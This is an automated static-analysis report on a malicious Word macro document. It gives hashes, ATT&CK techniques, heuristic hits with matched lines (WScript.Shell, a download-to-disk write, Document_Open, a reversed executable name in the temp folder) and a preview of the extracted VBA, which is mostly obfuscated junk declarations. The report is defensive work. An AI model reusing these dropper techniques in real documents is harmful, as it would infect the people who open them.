Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 79be33986135dfc5…

MALICIOUS

Office (OOXML)

81.0 KB Created: 2019-01-31 21:56:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2019-10-29
MD5: 146509b26c945c07591947a99971f36d SHA-1: c067278b848a9cfdff9071f8e5520abc86d10fe7 SHA-256: 79be33986135dfc519c6028a44724549dd51799d7b7d300140a2e33b9454bed3
338 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample is a malicious Office document containing VBA macros. The Document_Open macro is triggered upon opening, and it uses WScript.Shell and CreateObject to download and execute a second-stage payload. The document body explicitly instructs the user to enable content, indicating a social engineering lure to bypass macro security.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-7102478-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7102478-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            .Write r.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
     s = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.bbx1anai")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 32243 bytes
SHA-256: 050741c4eb1559ce2ab148d6776917be4f23efb8449c23b1eba358df55e63022
Detection
ClamAV: No threats found
Obfuscation or payload: likely
617 of 1057 identifiers look randomly generated (e.g. 'a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0w') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()

AA5ssetdtg0tn
End Sub


Attribute VB_Name = "vddew5wrcmp"


Public Sub mhxbreztlf0()

Dim efuz4wu3vaw As String
Dim sqqbsy0vlvx As String
Dim pmmgqu11gjg As String
Dim ed5te4fh4js As String
Dim vq3rqiuk4su As String
Dim zxcxwjkykib As String
Dim qdeethh4zrx As String
Dim jkw0owjyihw As String
Dim f4t2ygkd0m1 As String
Dim AA2vmb41avnyg As String
Dim pffuvwf02os As String
Dim mekwipyka5l As String
Dim jojb3dq53z2 As String
Dim fnjsevifsrq As String
Dim waaqo0ejw0i As String
Dim ho024au5kyf As String
Dim AA1ikxnrjojva As String
Dim a3cyacs3k4z As String
Dim kwddmy2zsdc As String
Dim gifnhdprgfv As String
End Sub

Public Sub a3smiox0fj5()

Dim sor2m1aawov As String
Dim pmi3sgalbmq As String
Dim wxlvrfot2z5 As String
Dim gcovvixbuso As String
Dim jngwm2qn3ml As String
Dim AA0rvcitgtwq0 As String
Dim nfhkvoy2po4 As String
Dim qn4sap4g4jh As String
Dim o3yhagekkru As String
Dim vsvziphx3ey As String
Dim vn1tibonwww As String
Dim bq3hhvl4xz0 As String
Dim rkqm5npxkdq As String
Dim yao4af2ssti As String
Dim kdwks2zyytg As String
Dim n55nnrbuvwk As String
Dim f4jkenbdvau As String
Dim kw1hovlr1i3 As String
Dim ydro3syzkkv As String
Dim xpjxdr2whf0 As String
End Sub

Public Sub c1kscocrsnc()

Dim ue0uqwnhwmo As String
Dim AA2qqyzctzgvm As String
Dim sgfeohin3rq As String
Dim wnkgmenddzp As String
Dim jrxwb5wtzi2 As String
Dim yststgrvp3b As String
Dim fccyyiwbzsj As String
Dim AA5yayvaw32os As String
Dim v3o144jb3tv As String
Dim rk3qw0ozfnp As String
Dim xfluvwbinwe As String
Dim rgab3yctj1u As String
Dim sv5xz3c1w1j As String
Dim pgb30bawyw4 As String
Dim zqccjkje1zb As String
Dim t32js0lwta5 As String
Dim AA1fgnawqpipe As String
Dim mhrpw2pzpfc As String
Dim AA2kntkj5p0z4 As String
Dim g5vbxaohkpk As String
End Sub

Public Sub AA0rpnnkgfw0k()

Dim eo3zgtppmeo As String
Dim tjdf0kf2oyr As String
Dim AA5dobqmcvqkt As String
Dim AA1buci4svvba As String
Dim ihrgn33cbo4 As String
Dim dema221tuf3 As String
Dim otruxlisxys As String
Dim f3ge1bx2krp As String
Dim kwl1qdfndat As String
Dim AA5tx555howbj As String
Dim ntlpveeqiku As String
Dim jn4nqthjoif As String
Dim z25kjwo2crv As String
Dim iewjnrpjwvx As String
Dim kiqtbd5hvyc As String
Dim AA03hx2u5wz1y As String
Dim wx4bxm2herz As String
Dim vff5dqk3ahv As String
Dim ej1f44fkher As String
Dim AA3aoscipb5ko As String
End Sub

Public Sub zx1fbobaw03()

Dim amsvpupw045 As String
Dim ohhakgo4axe As String
Dim AA0hifr3djyy3 As String
Dim AA5332qs5czvw As String
Dim wlrye0gxsmv As String
Dim iwvjlme3uss As String
Dim teccb4tmdc0 As String
Dim xebkkyxxzf4 As String
Dim AA0rtnfuiqsj5 As String
Dim fxy2akcnje0 As String
Dim ygcnbba10ru As String
Dim u0zvsujwhbc As String
Dim m21jeeehyzg As String
Dim zhddgbg4mvr As String
Dim kukp12jrib1 As String
Dim zxjaw3oh5vs As String
Dim cqd5nonyf4w As String
Dim q1e3tglycnw As String
Dim AA10rycgatyx3 As String
Dim n3oqoaveq2h As String
End Sub

Public Sub ipckklksy3f()

Dim tji4xdxvbwo As String
Dim phbusvovdjw As String
Dim k4cs1bu23hd As String
Dim sh2xzoew4v0 As String
Dim iqkerr1rxeq As String
Dim sg32io20f0s As String
Dim pybts5m5ph3 As String
Dim yov04gg3aen As String
Dim bfuqok31qpy As String
Dim y1oqpmuimzm As String
Dim zvgfrfejak0 As String
Dim aiafb5dsnqz As String
Dim bp2josw4oos As String
Dim AA45rpwu0vpz5 As String
Dim ldlomb44qgd As String
Dim tthozlutqc5 As String
Dim gjkvxrm51xh As String
Dim ed2vbak3zcp As String
Dim cuquexp2rac As String
Dim vb4hj1xhmxf As String
End Sub

Public Sub AA2sio2ng1ckp()

Dim ea42ncxenzm As String
Dim namwibpktfq As String
Dim n4bmolbgkow As String
Dim zkwe3cd1inx As String
Dim qfayjsj5rqi As String
Dim nyyt50snsct As String
Dim gi0mshinhda As String
Dim yvz4xeqefz3 As String
Dim r5tsvw1wpee As String
Dim zqwfadaamv3 As String
Dim k22q1prssao As String
Dim trefxtp01yg As String
Dim AA0iv33t3izxs As String
Dim c2gjcszvqcn As String
Dim AA20do0kwjut0 As String
Dim AA0hech3tvba5 As String
Dim rwntnx0bmjy As String
Dim do50ts2m1sz As String
Dim xmpijdjvi2w As String
Dim nnl4p3jusrp As String
End Sub

Public Sub AA0ykkumh1kkx()

Dim p442bhnf0vq As String
Dim mv0s00tupp3 As String
Dim AA4hel5r5c2uz As String
Dim ukmyb21neuw As String
Dim qklbcwstl1d As String
Dim rslw50lmwsn As String
Dim mvbhr31y4yy As String
Dim pzizwptarno As String
Dim zlznwftjox3 As String
Dim bkymgz1xijz As String
Dim AA0lc2hrzp3sf As String
Dim ttumjapb5jm As String
Dim njawkbcejor As String
Dim AA21c1qwq1rk0 As String
Dim crct3g5sank As String
Dim bwb1njqruxo As String
Dim qfmo0vgxnkk As String
Dim kyz1vakzm2e As String
Dim oe5iogn3pbr As String
Dim kv4ibw1fflm As String
End Sub

Public Sub og4blia2pmq()

Dim nr3nbwd53cn As String
Dim tum2qcwc4mz As String
Dim AA12szhzg3elo As String
Dim qb24siwpyxz As String
Dim xubp2hitrf5 As String
Dim lvahs2quhtv As String
Dim uacvw1jknxt As String
Dim afkrzesulhd As String
Dim AA5mu31zoznlf As String
Dim AA1ndcc1wmexj As String
Dim iakbuxzvmjq As String
Dim fcxws2jouqe As String
Dim c5tyk0ouvzu As String
Dim pk0rqrmynmo As String
Dim lav5ujmsos5 As String
Dim hlylnzeumir As String
Dim dnvadxcnav4 As String
Dim eex4ujh5e3c As String
Dim AA03fisl5tlvn As String
Dim zti0gwmdcqb As String
End Sub

Public Sub dmjxpxqvhdx()

Dim mqqq2si32vo As String
Dim hnl1kfg3qib As String
Dim ekk0z5tqzq5 As String
Dim n0lv4uxlnry As String
Dim zgdwl4vyyjt As String
Dim reuejnqkxqh As String
Dim bpav5bnt310 As String
Dim ljsus214vno As String
Dim oilwdfm225j As String
Dim ngrnage1prl As String
Dim o2aet14zedn As String
Dim AA4nhlrbawwr1 As String
Dim zbezjsnzen4 As String
Dim esr3m2uz3mf As String
Dim zieigilcmlh As String
Dim AA2mafblnds3t As String
Dim o4gfouuxmxv As String
Dim uulromem4b2 As String
Dim i2ascftz4uv As String
Dim kyferhymx4u As String
End Sub

Public Sub insrvtlqrmf()

Dim dn1l3lxqioc As String
Dim yzthnsch5yh As String
Dim d5megjedhd5 As String
Dim e4ov4xrqlcl As String
Dim pspumdwlkta As String
Dim rbx3cwwd3vg As String
Dim uxg2e2c0ioc As String
Dim gvynucreoj5 As String
Dim eetgs3b0vfj As String
Dim khbslkigtre As String
Dim mhkl0depcds As String
Dim AA0esd2y4ob4w As String
Dim q4l0b45vtcc As String
Dim l5uibe4yovh As String
Dim AA54jdlsfgeyn As String
Dim AA0dw14jbs2te As String
Dim AA1srdwbv50ri As String
Dim ak4w2gyr4m2 As String
Dim AA3xl2p5m3je5 As String
Dim AA4u2m4ozo5ke As String
End Sub

Public Sub vimub0aqj4l()

Dim dhimn3ujpca As String
Dim wevbb3veq4j As String
Dim vr2qvnqtkbb As String
Dim y3hclf4oejl As String
Dim c2tqlbkrbec As String
Dim mcco1gxj20b As String
Dim gmeow0nn2gn As String
Dim cbe2vzjx2p4 As String
Dim AA3njol1a33oz As String
Dim vu2g3mnjati As String
Dim AA4vqnhqlawdy As String
Dim u4bjs0q1eud As String
Dim im2hjecy0nt As String
Dim vjazj1bg2yr As String
Dim dfbbbmphsw2 As String
Dim ktb2vjsckez As String
Dim uinafx2v4yv As String
Dim g1xzjjwcyzg As String
Dim hxn1acnpjg3 As String
Dim AA3wgt0fzgnlb As String
End Sub

Public Sub AA3n5whnsmzya()

Dim ud0pd2o2hd0 As String
Dim pzox1ngaj3m As String
Dim bfr2v5ivubg As String
Dim gj54vmggmvo As String
Dim fiwsoszjc2x As String
Dim uxzrg23w4gh As String
Dim n0newly4p33 As String
Dim p4uokbylcu3 As String
Dim niv2rjzofbd As String
Dim bnmafln0b4l As String
Dim cgfckm4yql4 As String
Dim g2aeqctp3at As String
Dim pvaavnj3rmf As String
Dim hxjd0xwudwy As String
Dim csqex2sc1cg As String
Dim xnaocfojglz As String
Dim vhnytas1vog As String
Dim AA5q35docbuwy As String
Dim AA21wtncbmuvm As String
Dim sq33lkrcz5a As String
End Sub

Public Sub jtgkxgiwrkb()

Dim col3nbkpqv4 As String
Dim AA3xodkhmwr5u As String
Dim xanh5xdbsun As String
Dim nojei5a4ocq As String
Dim pznwnomxvhd As String
Dim bxbv5bs14h1 As String
Dim vajky42adfp As String
Dim ogo2uefjoa2 As String
Dim myagd1jxqqt As String
Dim AA3qx5ffvde2d As String
Dim cghz14eh3dc As String
Dim zjl13hddy4n As String
Dim qclo1te1kv3 As String
Dim aio0irkb2gf As String
Dim zidtmikczyi As String
Dim jeqpoxryfar As String
Dim ct2qnxibcdu As String
Dim apcyanvqehy As String
Dim t2sd3dzkmqt As String
Dim rc1y1dtfic5 As String
End Sub

Public Sub iqzontdxlnf()

Dim dxvxofwfnin As String
Dim AA0oldn3brf5k As String
Dim vhrpahesq1t As String
Dim q3rn40zn2nk As String
Dim jfgpkpy1mns As String
Dim zhrr04mrwup As String
Dim y3ngql44dmj As String
Dim AA5uozl5cmjwe As String
Dim xgyzwquaejo As String
Dim rdo41gyya0b As String
Dim dl0kaz1t4ux As String
Dim hj4uwnhclcg As String
Dim oezlapwjh4w As String
Dim eh5zydi3z1x As String
Dim zx2vide3umi As String
Dim wr3gedotswa As String
Dim yme5xwntu5n As String
Dim xcfnfkk0k3r As String
Dim a3slkyq3yic As String
Dim gbrmhfktyz1 As String
End Sub

Public Sub z5hwn4lmuxd()

Dim AA5li0l1yzheg As String
Dim bjpz2d2z1wm As String
Dim AA23zg14rk3i0 As String
Dim AA5lxxa43r5df As String
Dim o0st3fql23u As String
Dim f2acn1yrdbq As String
Dim wd5zw3zjqqo As String
Dim AA4adzam2d3si As String
Dim AA0yhfxr2nqrc As String
Dim bmpzfnmuf0s As String
Dim noqlaiurxxe As String
Dim qj2elrruw3q As String
Dim ucpz2vi3cwq As String
Dim cva0temyjuh As String
Dim hwnlfd05m1p As String
Dim f3xqrtdfou2 As String
Dim ixqn0c3i3ik As String
Dim pn3tidy01tz As String
Dim ic5tymvqtc5 As String
Dim AA32yb03rat5z As String
End Sub

Public Sub sjzu0oknftt()

Dim urn20qjrfpw As String
Dim zcltmldqr5p As String
Dim zrxbr2ziab5 As String
Dim paukgq34ems As String
Dim xlu3t3nqsc1 As String
Dim AA0lvvtxu4tna As String
Dim pbak01aehxj As String
Dim AA3uzwxufb0xi As String
Dim bzhg5evxs12 As String
Dim AA2abey0pxd5v As String
Dim sgfir3whvrl As String
Dim ahz3zbedbk0 As String
Dim pdutsqum3jv As String
Dim tfytct5o2qh As String
Dim dpl4zecevjh As String
Dim f2owax1q0fa As String
Dim AA3e12rg3gejv As String
Dim b0upbbbtm14 As String
Dim jfriuhughen As String
Dim rrczreyupgh As String
End Sub

Public Sub pd14bpjkzxg()

Dim ebrlygbtwmk As String
Dim zq0dszfp23l As String
Dim y25serz0ycv As String
Dim smagvjtjvyo As String
Dim rxxlyh1nswo As String
Dim AA3asyl1j3ayo As String
Dim AA3y0hyuzfrmh As String
Dim ea55fzsd335 As String
Dim qeh3uw0tgtz As String
Dim ay42wi11k12 As String
Dim AA3ngodcsrelo As String
Dim AA40lzma4hnyi As String
Dim sumytii4k3x As String
Dim hl34dt0m54v As String
Dim nypizupe1eu As String
Dim hoqtyrgrxwg As String
Dim bj32rxxtc1p As String
Dim yrodr11cggr As String
Dim l2zezjsbw5j As String
Dim akcoaccbvqf As String
End Sub

Public Sub nk1420b0cqm()

Dim AA4aqowmrpefc As String
Dim y5to05k4mgj As String
Dim hglucl55uok As String
Dim AA5pv5lgjqxl4 As String
Dim kh53paknklb As String
Dim AA1pm2ja1niwu As String
Dim AA1pkl05b23bl As String
Dim AA0lgac2byj2j As String
Dim wshz5w2gs0z As String
Dim jw0oqokmmal As String
Dim tvtlkwi1xz3 As String
Dim hl5mjrbxbeo As String
Dim jlenaohtlxi As String
Dim mdfstotuqkc As String
Dim xd0f0x34khn As String
Dim o233xsbu3rn As String
Dim rxhcgdw4qmk As String
Dim styh1xleyud As String
Dim zuctefjzvlx As String
Dim tpfobhascen As String
End Sub

Public Sub AA12y1huqclr0()

Dim zsol5yhgtmk As String
Dim v4smjzzqqtm As String
Dim d0m20ar15i2 As String
Dim enfeu2liysb As String
Dim txwkrcjda54 As String
Dim bhu2nruvq5v As String
Dim afmjrm2lgbz As String
Dim AA1r54siat0zh As String
Dim l3vlsbqfom2 As String
Dim uni55phms4k As String
Dim AA4pelcaqkp5l As String
Dim s2ujtq3sxdh As String
Dim fkyaam3o4vw As String
Dim amypirpgtxg As String
Dim AA3zdzw5w5huq As String
Dim pstonikboyl As String
Dim dhr1kvkhjcw As String
Dim wmyc0fgeamp As String
Dim czna0ba0ffk As String
Dim hr145se0d3c As String
End Sub

Public Sub AA344gfgg033o()

Dim wqmkuzxxlp0 As String
Dim AA5pzpwlfhxin As String
Dim qbjknkyqik3 As String
Dim mo0542pgqcw As String
Dim AA3mgcp1zdpsx As String
Dim u4rdkqdg303 As String
Dim jpos3ssfv2p As String
Dim hs05nc4knhr As String
Dim AA4zd22gs23jp As String
Dim kbiby2e5tm0 As String
Dim pulz1ug3nne As String
Dim w5sxzyqwywv As String
Dim zzmuyzgdixx As String
Dim ycnwhav5drc As String
Dim t2gqwfdo5wp As String
Dim sfmlvfutk1d As String
Dim AA43tdd5lxnii As String
Dim dvqkaqgroee As String
Dim nzx1lrxdzdd As String
Dim AA44zht42isuz As String
End Sub

Public Sub tltb5nbl1jp()

Dim epmr1e2bo4u As String
Dim oxld3g04kfc As String
Dim lso0osqv14l As String
Dim s5hxq3iwih1 As String
Dim eqv5lry3c2y As String
Dim wl0nmmokhde As String
Dim ararnzeyqm0 As String
Dim zalrgktjhey As String
Dim jrmeamb2ayz As String
Dim dgkayl4pwso As String
Dim bjmfjnb4ypl As String
Dim a44lseetusi As String
Dim k5g3eycnnb3 As String
Dim AA4t4ejodg4ks As String
Dim fhxlvmwqbj5 As String
Dim AA5dz4mswrleo As String
Dim AA5wz5u4v2qlv As String
Dim otppdp1vaen As String
Dim eaddsjfwsai As String
Dim AA4esn15tqlv3 As String
End Sub

Public Sub vg3iqyk02iq()

Dim ndm0tp1hewj As String
Dim w2gm5i5arxd As String
Dim lgcbbf2n2vm As String
Dim AA353ra0gszcu As String
Dim fd3elskkjur As String
Dim AA5w44wcg3wj3 As String
Dim vier2vl3bvh As String
Dim AA2nma0epju0w As String
Dim AA2deb4eedzfx As String
Dim joukyqfmhrj As String
Dim wqcqqzn55om As String
Dim dnnardlh2gh As String
Dim sew3njft0gu As String
Dim czfbqqemlb0 As String
Dim qbnpl2w4cz5 As String
Dim AA545lfzvvagw As String
Dim AA0dtqbo5ocow As String
Dim jmc5eszm1tn As String
Dim AA3ct4n2iwhvp As String
Dim gaaqbc1l5fe As String
End Sub

Public Sub AA0hnslhl3pil()

Dim df1lkbh2z1u As String
Dim AA3arbg04g2n5 As String
Dim bxqwhmp2z1l As String
Dim ll3fvd4qp5j As String
Dim cpwofynqmdb As String
Dim li3v0ejtdak As String
Dim piury4jpa3y As String
Dim uqpubadtnns As String
Dim AA3yirdlbuh1e As String
Dim tertzkfqlf0 As String
Dim kv1jqwsrlmd As String
Dim f4bmkflajwo As String
Dim rvb3zcrcsvi As String
Dim pxkxhvor00j As String
Dim liei5gubp2m As String
Dim flgjfgceha2 As String
Dim aqpwyf4juqw As String
Dim atklg4qfksz As String
Dim qpfpnchhunn As String
Dim boo4xrtrykh As String
End Sub

Public Sub cxyyl5t0ums()

Dim ayt3k5oqhyv As String
Dim mbppsrc5ivk As String
Dim d52pzoarzls As String
Dim kzwpbolk5cz As String
Dim oi3yq0xjsp3 As String
Dim AA1nfapr2tsug As String
Dim cwwwbitg5jj As String
Dim xvjfmugb5zk As String
Dim mcgrsrms3bx As String
Dim fcfesdzhir5 As String
Dim njnrhn0znse As String
Dim bk0hplrggix As String
Dim wrbhnrselqi As String
Dim xr2cifvfhun As String
Dim xhmhv2jv1vl As String
Dim AA2txayqu5uxx As String
Dim cb24jv5rdte As String
Dim y05e3c0s1rt As String
Dim wmdycrgnws0 As String
Dim AA1pwz2bet4pt As String
End Sub

Public Sub h1cewlpqsgk()

Dim AA0v1yjnllauy As String
Dim qxmeyeekoni As String
Dim sbed4jjfzio As String
Dim solnevzpkvc As String
Dim AA3ev5xdwr2je As String
Dim jleqkgb1cuk As String
Dim ai5ez0gzirc As String
Dim AA2raf1le3it0 As String
Dim oef3t2iwnl1 As String
Dim AA2vzkgt2ibv0 As String
Dim tcfd2qa3rvc As String
Dim AA5xwemnugakg As String
Dim nwe5snacau4 As String
Dim qag5lpgbofc As String
Dim flsm5yisx1z As String
Dim zjdvtkj4wl3 As String
Dim AA1cems5vx5qf As String
Dim d3ujv5coe5u As String
Dim jl25wns5ezt As String
Dim i1xpn4v4yc3 As String
End Sub

Public Sub eiunwxtfiht()

Dim nzyyphzflba As String
Dim AA4gdtsok10hq As String
Dim pe02mn1km02 As String
Dim n5pfxzataif As String
Dim t04iyyia0np As String
Dim hyyqawwz3rn As String
Dim blsrp14vy41 As String
Dim bp1hxmm4nnr As String
Dim kyo1sgfkoag As String
Dim qhvdfljcxpv As String
Dim xjynuzufxol As String
Dim jdrbykjl4dw As String
Dim xdcp34psqsb As String
Dim AA2lupuueq3ff As String
Dim cnynickdcok As String
Dim AA5q51in5bjen As String
Dim xuoclb54rz0 As String
Dim wufyybfptn5 As String
Dim mhyk3zlvxsp As String
Dim b3fd1qvnjwr As String
End Sub

Public Sub mh4n5efx2mv()

Dim AA5snj1dz1jyq As String
Dim rryneed4cvj As String
Dim AA2u41whu24gn As String
Dim wyeh02fz020 As String
Dim i3ak3l14qfc As String
Dim AA00gra3u5nxt As String
Dim kbaq4saaemu As String
Dim yr1sm1wkcsz As String
Dim mc3nudmbsb4 As String
Dim y1n3k1jfxax As String
Dim u0ounhzvf1f As String
Dim t2wazgove30 As String
Dim xn13zblvmuu As String
Dim fbftl4lftt5 As String
Dim oo1ywsodedi As String
Dim kuhlxyasibf As String
Dim AA5mep20xd3uw As String
Dim jhntcrtpn2c As String
Dim zrvy4vscio2 As String
Dim u4n3pqyoq0j As String
End Sub

Public Sub boy3hbujbhi()

Dim aukdlwr3ykw As String
Dim m2kzrncinnc As String
Dim a4mc2qeuvcu As String
Dim cua2rm3yrag As String
Dim AA4ph54w3fzzl As String
Dim t0a4v3fkczc As String
Dim tdhzmvfsc04 As String
Dim zezidrrrfq0 As String
Dim o2yivgphoub As String
Dim txcrxg3x2ky As String
Dim lqzfs5dx3qt As String
Dim vpmnvoarsun As String
Dim xd5pjkhfpnk As String
Dim y3rxsc24h00 As String
Dim e1lv1fxugpo As String
Dim ezexl5naak3 As String
Dim lyekwpsjds4 As String
Dim pqerx5jmh5w As String
Dim bnxisil5fsg As String
Dim nnaoxc5jwh5 As String
End Sub

Public Sub cmpjiks5ihf()

Dim bfd1vtqfftp As String
Dim AA053m5rmwd0l As String
Dim qcr24cjimh2 As String
Dim bvgc0v3m3ju As String
Dim bvicao2oj2s As String
Dim tdeujdlhmky As String
Dim npxlgoewlub As String
Dim wstkidjn5c4 As String
Dim mw0hbiwdhqx As String
Dim a125hae12ye As String
Dim akc0qyrxdiw As String
Dim lx1zclwobk5 As String
Dim zyc1savdd1t As String
Dim gomntoo5k1x As String
Dim nxy5xysdoud As String
Dim ipagz0sixb2 As String
Dim olg4zbkjr2l As String
Dim cneee4ca3gy As String
Dim tvqnl44hbvj As String
Dim tz5un141zgw As String
End Sub

Public Sub AA3sd4mlrstkp()

Dim eikzhswhfeb As String
Dim zekxf1gnwhg As String
Dim AA0t3y1cdj2ho As String
Dim AA4tegzxcj42k As String
Dim AA5c20firptiq As String
Dim ekdjfbdkp3b As String
Dim edidpof2txe As String
Dim AA1y0xh0ixkcx As String
Dim iszyryxwzo4 As String
Dim xsr2syn2hxd As String
Dim v5zp3woozd2 As String
Dim i4iqc5bqejt As String
Dim tfmdamaydho As String
Dim nj3pgji433g As String
Dim inflx5s12kh As String
Dim posmt5jdghb As String
Dim mg2nob3ths5 As String
Dim fmkqkbgxzpp As String
Dim tvbhojuxncm As String
Dim wfvrbdsk1yf As String
End Sub

Public Sub iulz02t1gvl()

Dim gtvx13pvami As String
Dim AA5f0evteiouf As String
Dim zuadgdvp2xv As String
Dim tqkst0rujji As String
Dim AA2lf4nqqhl4l As String
Dim d4amjat5eli As String
Dim gksn3mpoow5 As String
Dim i42gy1kznga As String
Dim hjqold44yjv As String
Dim ugwqhex0xep As String
Dim lemigce45ek As String
Dim ztogdiy4fc0 As String
Dim d5l0gsuoggc As String
Dim dox3o41ys4z As String
Dim k31uhbvoxiw As String
Dim tynnaiw2qhs As String
Dim tocde3qpw5g As String
Dim u4azovbryur As String
Dim oqh0s3zvsz5 As String
Dim AA5e5rxfkgzfd As String
End Sub

Public Sub nwfgh4otfrv()

Dim nb4xu3mdj0a As String
Dim gcgv1zql1e4 As String
Dim g50lmcv4hqs As String
Dim hpr5uqukbtv As String
Dim tw0du04o5py As String
Dim cvgx1adxkj5 As String
Dim lluprfiy52t As String
Dim tyfsvowfonj As String
Dim vhcln2pqgvm As String
Dim fwp4utf3l4d As String
Dim qdcjwr1n2w5 As String
Dim tsni54qm04p As String
Dim ocnatlowri2 As String
Dim dpxmw5llvn1 As String
Dim AA2jelbryacjf As String
Dim bfce2rcbuly As String
Dim AA5auo3eha1xx As String
Dim ehpff1ov2pq As String
Dim whb0g1jor2y As String
Dim q5jrqhhaoug As String
End Sub

Public Sub AA0ib13fciyls()

Dim slid1dompwt As String
Dim j4kjnvf0d5b As String
Dim rvhvdccuvgx As String
Dim AA3uxmvmvidbk As String
Dim tipriaplgjx As String
Dim rdcduu1ti4i As String
Dim AA0hj14x30vou As String
Dim w4vqaoswbey As String
Dim AA4rd5xqtro3o As String
Dim oyweg0xx5am As String
Dim gwb5gksk2xc As String
Dim vmhckjpgldq As String
Dim ypbperhrlji As String
Dim b2hbrtcrsml As String
Dim AA2tlyy25bqmf As String
Dim AA5nbcafazkab As String
Dim qkvwfx0w55l As String
Dim pw2scg3bf4y As String
Dim g3gb0mf4zso As String
Dim ta5bkjhn3b2 As String
End Sub

Public Sub h4d1tqy4jvg()

Dim x3qeehouuxw As String
Dim sz0g00i3btw As String
Dim i2i3jzohzbi As String
Dim e3ongqte153 As String
Dim jv0bnqz1gcx As String
Dim hks4beciv25 As String
Dim jteivmbytng As String
Dim ux4g2sntn0t As String
Dim rvj2qht4mcq As String
Dim zpe1cmiftcx As String
Dim x2stpnar10j As String
Dim zftws3o055o As String
Dim gab4fwgp1v0 As String
Dim dkvfhrlb0j3 As String
Dim igv1ma11oxc As String
Dim nsq3wzes2ad As String
Dim viqbrfftts5 As String
Dim hnb1xoye3nb As String
Dim xfuktjuq4v0 As String
Dim xu3xlbgdgbl As String
End Sub

Public Sub jglz3u2z5ao()

Dim azl5ja0zuv5 As String
Dim rw4xrhoadeo As String
Dim cjzmogje2ve As String
Dim qkeox5uzbdq As String
Dim fobe12yd5s1 As String
Dim qxaczgpzjr3 As String
Dim mhuyeikx1vv As String
Dim AA4mgafmskbb3 As String
Dim xchpms10hjp As String
Dim rybvxqbi20c As String
Dim tq4vn4lcbsd As String
Dim cmrm0kpjj3s As String
Dim tqc3acri5b5 As String
Dim zcr55d4faom As String
Dim pfjncz33b2h As String
Dim o5gghpvibxs As String
Dim flvgfb0fvph As String
Dim n4mp0trkcc1 As String
Dim hlzw1mjxaca As String
Dim v41v3e300wm As String
End Sub

Public Sub AA5wcmbd425zi()

Dim hs4j1gf1ql4 As String
Dim bzpfkfoibny As String
Dim m24sofobc14 As String
Dim z1053y1kp2y As String
Dim AA3w1zur3oqcc As String
Dim tkrp1ymrvgq As String
Dim z3phzeq1wtc As String
Dim g2ar3ocoglp As String
Dim zwrasfd0t1h As String
Dim AA4qq3nokxstm As String
Dim ucdrzp1u3k2 As String
Dim yrca05ukgas As String
Dim gbzrnwty15o As String
Dim AA3e2wztf240x As String
Dim mqktswkzlqo As String
Dim AA5zthn4o5qdh As String
Dim zxsaz3srh2k As String
Dim yoqaqvwsnto As String
Dim ifvgs3lmvn5 As String
Dim f5kyzqxq1p5 As String
End Sub

Public Sub rr5q1d2fvao()

Dim wx0edex1ct4 As String
Dim el5yum2nqeu As String
Dim dj4uzk232pb As String
Dim usjn3ril3ld As String
Dim gumtn12naj3 As String
Dim xuaabtvguhe As String
Dim p3txtcbdqbb As String
Dim pd4lmqyd3xo As String
Dim ag51qlhcelg As String
Dim g5yldamccuq As String
Dim py4hyxroa5a As String
Dim AA0yjavcvywv0 As String
Dim nwyk3yjd44f As String
